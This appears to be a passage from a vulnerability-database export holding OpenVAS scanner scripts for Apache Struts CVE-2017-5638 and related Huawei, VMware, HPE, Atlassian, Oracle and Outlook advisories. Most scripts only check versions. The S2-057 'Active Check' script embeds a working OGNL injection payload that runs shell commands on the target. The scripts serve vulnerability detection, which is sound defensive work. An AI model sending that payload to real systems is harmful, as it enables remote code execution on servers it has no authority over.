See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. 
This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the 
terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. 
Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! 
vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. 
This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# 
as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to 
CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing an important security\n update according to Microsoft KB4011162", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-11776"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811922", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811922\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11774\", \"CVE-2017-11776\");\n script_bugtraq_id(101098, 101106);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 09:33:40 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Outlook 2016 Multiple Vulnerabilities (KB4011162)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011162\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft Outlook fails to establish a secure connection.\n\n - Microsoft Office 
improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain the email content of a user, also could execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Outlook 2016.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011162\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/Office/Outlook/Version\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noutlookVer = get_kb_item(\"SMB/Office/Outlook/Version\");\nif(!outlookVer || outlookVer !~ \"^16\\.\"){\n exit(0);\n}\n\noutlookFile = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\App Paths\\OUTLOOK.EXE\", item:\"Path\");\nif(!outlookFile){\n exit(0);\n}\n\noutlookVer = fetch_file_version(sysPath:outlookFile, file_name:\"outlook.exe\");\nif(!outlookVer){\n exit(0);\n}\n\nif(version_in_range(version:outlookVer, test_version:\"16.0\", test_version2:\"16.0.4600.0999\"))\n{\n report = 'File checked: ' + outlookFile + \"\\outlook.exe\" + '\\n' +\n 'File version: ' + outlookVer + '\\n' +\n 'Vulnerable range: 16.0 - 16.0.4600.0999'+ '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote 
code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. 
Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n 
\"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-29T22:07:15", "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3506", "CVE-2017-5638", "CVE-2016-1181"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310810748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810748\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2017-5638\", \"CVE-2016-1181\", \"CVE-2017-3506\");\n script_bugtraq_id(96729, 91068, 97884);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-19 14:58:02 +0530 (Wed, 19 Apr 2017)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Multiple Vulnerabilities-01 (cpuapr2017-3236618)\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to some unspecified error in the 'Samples (Struts 2)' and\n 'Web Services' sub-component within Oracle WebLogic Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [], "mskb": [{"lastseen": "2023-06-25T10:48:01", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>). 
\n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Office 2010](<http://support.microsoft.com/kb/2687455>) installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home. (See Determining your Office version.)\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011196>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. 
